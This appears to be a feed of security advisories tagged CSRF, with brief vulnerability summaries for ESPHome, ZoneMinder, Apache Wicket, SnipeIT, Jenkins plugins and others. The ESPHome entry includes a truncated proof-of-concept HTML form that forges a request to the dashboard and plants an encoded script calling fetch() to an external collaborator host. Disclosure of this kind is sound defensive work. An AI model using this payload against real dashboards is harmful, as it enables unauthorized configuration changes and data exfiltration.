#csrf

### Summary API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). ### Details It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. ### PoC An example of malicious web page that abuses this vulnerability: <html> <body> <form action="http://localhost:6052/edit?configuration=poc.yaml" id="#main" method="POST" enctype="text/plain" onsubmit="setTimeout(function () { window.location.reload(); }, 10)"> <input type="hidden" name="&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x" value="y&apos;&#44;&#32;&#123;&#13;&#10;method&...

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.

A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.